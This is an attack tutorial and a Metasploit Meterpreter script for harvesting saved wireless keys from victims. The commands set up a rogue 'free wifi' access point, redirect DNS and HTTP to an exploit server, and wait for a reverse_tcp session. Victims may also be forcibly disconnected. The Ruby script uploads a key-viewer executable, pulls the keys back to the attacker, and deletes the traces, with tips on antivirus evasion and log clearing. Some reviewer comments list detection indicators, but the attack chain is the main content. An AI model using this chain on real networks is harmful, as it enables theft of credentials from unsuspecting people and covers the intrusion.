Wireless key harvester. First we create our Meterpreter exe; check this page out: http://synjunkie.blogspot.com/2008/10/metasploit-payloads-msfpayload.html Then set up our listener: ./msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 10.0.0.1 set LPORT 55555 set AutoRunScript /home/hm/Desktop/http/wirelesskeyharvester.rb set ExitOnSession false show options exploit -j Next, set up our fake access point: modprobe tun airbase-ng -P -C 30 -e "free wifi" wlan1 -v Now we set up our DHCP server: ifconfig at0 up ifconfig lo up ifconfig at0 10.0.0.1 netmask 255.255.255.0 ifconfig at0 mtu 1400 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1 iptables -P FORWARD ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1 /etc/init.d/dhcp3-server restart Set up the web server (the commands below use lighttpd) to host our exploit: /etc/init.d/lighttpd stop lighttpd -D -f '/home/hm/Desktop/http/http' DNS redirector -- in this case dnspoison: cd dnspoison java ServerKernelMain 10.0.0.1 10.0.0.1 And that's it: wait for victims to connect, or forcefully disconnect them using mdk!!!!!! 
# --------------------------- harvester.rb ---------------------------------------
#
# Wireless key harvester using wireless key viewer"
#
# Meterpreter post-session script (the accompanying notes load it via
# `set AutoRunScript`, so it runs once per new session). Flow, in order:
# upload a helper exe to the system drive root, run it through cmd.exe so it
# writes a randomly named .txt, pull that file back to the handler machine,
# then delete both files on the host.
#
# `session`, `client` and `print_status` are not defined in this file;
# presumably they are supplied by the Metasploit script runtime.
#
# NOTE(review): on-host artifacts this script leaves while it runs, useful
# as detection indicators: a file %SystemDrive%\wkv.exe, a 5-letter
# upper-case .txt file in the same directory, and three cmd.exe /c
# invocations (one run, two `del`). No error handling: if any step fails
# the remaining steps still execute.
require 'rex'

# Extract the host and port
# session.tunnel_peer is split on ':' into the peer address and port, used
# only for the status message below.
host,port = session.tunnel_peer.split(':')
print_status("New session found on #{host}:#{port}...")

# bin -- the name of our exe
bin = "wkv.exe"

# output of wireless key viewer
# Five random upper-case letters plus ".txt"; regenerated on every run.
out = Rex::Text.rand_text_alpha_upper(5) + ".txt"

#destination for the keys in txt format
# Local (handler-side) directory; must already exist and end in a slash,
# since it is concatenated directly with `out` below.
dest = "/home/hm/Desktop/keys/"

#upload wireless key viewer --- modify it to bypass av's
# Argument order for upload_file is (remote path, local path); the remote
# path uses the %SystemDrive% environment variable rather than a fixed
# drive letter.
print_status("Uploading Wireless Key Viewer")
sleep(1)
client.fs.file.upload_file("%SystemDrive%\\#{bin}", "/home/hm/Desktop/http/wkv.exe")
sleep(1)
print_status("Uploaded Wireless Key Viewer")
sleep(1)

#execute via cmd, output will be random name,
# Note: the remote path is spelled out here as wkv.exe rather than via `bin`,
# and 'Hidden' is passed as the string 'false', not the boolean false.
print_status("Executing wireless key viewer ")
client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stabular /#{out}", nil, {'Hidden' => 'false'})
# The message below says "bat file", but the command above is a direct
# cmd.exe /c invocation; no .bat file is written.
print_status("bat file executed")
sleep(1)

#download keys to our keys folder
# Argument order for download_file is (local path, remote path).
print_status("Downloading keys to keys folder ")
client.fs.file.download_file("#{dest}#{out}", "%SystemDrive%\\#{out}")
print_status("Downloaded keys to keys folder ")

#delete uploaded files -- we can also clear logs here if we want to
# Clean-up is done with two hidden cmd.exe processes rather than the
# file API; both file names carry a trailing space inside the command string.
sleep(1)
print_status("Deleting uploaded files ")
client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{bin} ", nil, {'Hidden' => 'true'})
client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{out} ", nil, {'Hidden' => 'true'})
print_status("Have a nice day!!!!!! ")